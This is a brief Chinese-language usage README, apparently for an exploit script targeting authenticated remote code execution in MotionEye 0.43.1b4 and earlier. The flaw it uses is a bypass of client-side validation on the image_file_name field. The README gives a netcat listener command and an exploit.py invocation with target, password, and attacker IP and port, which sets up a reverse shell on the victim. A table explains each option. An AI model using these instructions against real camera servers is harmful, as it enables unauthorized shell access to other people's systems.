通过绕过 image_file_name 字段上的客户端验证,可在 MotionEye <= 0.43.1b4 中实现已认证 RCE。
nc -lvnp 4444
python exploit.py -t http://127.0.0.1:8765 -p password -lh IP -lp 4444
| 参数 | 描述 |
|---|---|
-t | 目标主机/URL(默认为 8765 端口) |
-u | 用户名(默认:admin) |
-p | 密码 - 与你在 GUI 中输入的相同 / 可在 motion.conf 中找到 |
-lh | 你的攻击机 IP |
-lp | 监听端口 |
--camera-id | 摄像头 ID(省略时自动检测) |